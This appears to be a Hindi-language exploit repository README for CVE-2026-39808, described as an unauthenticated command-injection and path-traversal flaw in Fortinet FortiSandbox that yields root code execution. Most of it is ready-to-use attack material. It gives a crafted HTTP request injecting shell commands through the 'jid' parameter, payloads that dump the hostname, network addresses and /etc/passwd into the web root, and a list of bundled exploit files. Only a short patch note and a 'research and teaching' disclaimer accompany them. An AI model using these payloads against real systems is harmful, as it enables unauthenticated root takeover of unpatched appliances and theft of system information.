
CVE-2026-39808
इस रिपॉजिटरी में CVE-2026-39808 के लिए एक साफ और अच्छी तरह से प्रलेखित प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है — जो Fortinet FortiSandbox में एक गंभीर अप्रमाणित कमांड इंजेक्शन भेद्यता है, जो सैंडबॉक्स एस्केप और रूट (uid=0) के रूप में रिमोट कोड निष्पादन की अनुमति देती है।
jid पैरामीटर के माध्यम से पथ ट्रैवर्सल + कमांड इंजेक्शन
सफल शोषण uid=0 gid=0 groups=0 दिखा रहा है
| संस्करण श्रेणी | स्थिति |
|---|---|
| FortiSandbox 4.4.0 – 4.4.8 | कमजोर |
| FortiSandbox 5.0.0 – 5.0.5 | कमजोर |
| 4.4.9+ / 5.0.6+ | पैच किया गया |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
ब्राउज़र में खोलें:
https://your-lab-ip/ng/out.txt
# आईपी पता + होस्टनाम प्राप्त करें
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|
# पूर्ण सिस्टम रिकॉनिसेंस
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
poc.py → स्वचालित Python एक्सप्लॉइटburp-request.txt → उपयोग के लिए तैयार Burp Suite अनुरोधpayloads.md → उपयोगी पेलोड का संग्रहscreenshots/ → चरण-दर-चरण शोषण छवियाँREADME.md → यह फ़ाइलFortiSandbox को तुरंत निम्नलिखित संस्करणों में से किसी एक में अपडेट करें:
Fortinet ने इस भेद्यता को संबोधित करने वाले आधिकारिक पैच जारी किए हैं।
अनुसंधान एवं शिक्षण उद्देश्यों के लिए बनाया गया
⭐ इस रेपो को स्टार करें यदि इसने आपकी मदद की!